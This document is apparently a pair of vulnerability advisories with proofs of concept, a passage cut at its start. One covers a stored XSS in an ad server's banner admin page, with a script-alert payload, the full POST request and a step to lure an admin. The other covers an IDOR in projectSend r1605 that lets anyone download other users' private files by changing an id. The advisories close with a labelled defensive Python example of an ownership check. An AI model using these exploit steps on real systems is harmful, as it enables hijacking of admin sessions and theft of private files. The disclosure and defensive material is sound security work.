Author: Mirabbas Ağalarov
Tested on: Linux


2. Technical Details & POC
========================================
Steps:

1. Go to Create banner
2. Select the Advanced section
3. Write this payload in the prepend and append parameters (%3Cscript%3Ealert%281%29%3C%2Fscript%3E)

POST /www/admin/banner-advanced.php HTTP/1.1
Host: localhost
Content-Length: 213
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: sessionID=5224583cf474cd32d2ef37171c4d7894
Connection: close

clientid=3&campaignid=2&bannerid=2&token=94c97eabe1ada8e7ae8f204e2ebf7180&prepend=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&append=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submitbutton=De%C4%9Fi%C5%9Fiklikleri+Kaydet



We then send this link to the admin; if the admin clicks it, the XSS fires:

http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2
</code></pre>
<pre><code>Exploit Title: projectSend r1605 - Private file download
Application: projectSend
Version: r1605
Bugs: IDOR
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date found: 24-01-2023
Author: Mirabbas Ağalarov
Tested on: Linux



Technical Details & POC
========================================

1. Access to the private files of any user, including the admin


Just change the id:



GET /process.php?do=download&id=[any user's private pictures id] HTTP/1.1
Host: localhost
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/manage-files.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: download_started=false; PHPSESSID=e46dtgmf95uu0usnceebfqbp0f
Connection: close
</code></pre>
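Added example (not part of the advisory and not projectSend's code): the object-level authorization check that a download handler needs so that changing the `id` alone does not yield someone else's file. The decision is made from the authenticated user and the file's ownership and sharing records, never from the id the client supplied, and an unauthorized id is answered exactly like a non-existent one so the response does not confirm which ids exist. The data model, the sharing rules and the function names are assumptions made for this illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str = "client"      # assumption: "client" or "admin"


@dataclass(frozen=True)
class StoredFile:
    id: int
    owner_id: int
    public: bool = False
    shared_with: frozenset = frozenset()   # user ids the file was explicitly assigned to


# Constructed file table (assumption: not projectSend's real schema).
FILES = {
    1: StoredFile(id=1, owner_id=1),                              # admin's private file
    2: StoredFile(id=2, owner_id=2),                              # client 2's private file
    3: StoredFile(id=3, owner_id=2, shared_with=frozenset({3})),  # client 2's file, shared with client 3
    4: StoredFile(id=4, owner_id=1, public=True),                 # public file
}


def can_download(user, stored):
    """Object-level authorization: the decision is keyed on the authenticated
    user and the file's own records, never on the id the client supplied."""
    return (
        user.role == "admin"
        or stored.owner_id == user.id
        or stored.public
        or user.id in stored.shared_with
    )


def handle_download(user, file_id, files=FILES):
    """Mimic process.php?do=download&id=N and return (status, body).
    Unauthorized and non-existent ids get the same 404 so that the response
    does not reveal which ids exist."""
    if user is None:
        return 401, "login required"
    stored = files.get(file_id)
    if stored is None or not can_download(user, stored):
        return 404, "not found"
    return 200, f"contents of file {stored.id}"


if __name__ == "__main__":
    for uid, role in [(2, "client"), (3, "client"), (1, "admin")]:
        user = User(uid, role)
        print(uid, role, [handle_download(user, fid)[0] for fid in (1, 2, 3, 4, 99)])
```

Using an unguessable identifier (a UUID) for files reduces the chance of an id being guessed, but it does not replace the ownership check; the lookup by id and the authorization decision have to happen together in the handler for every request.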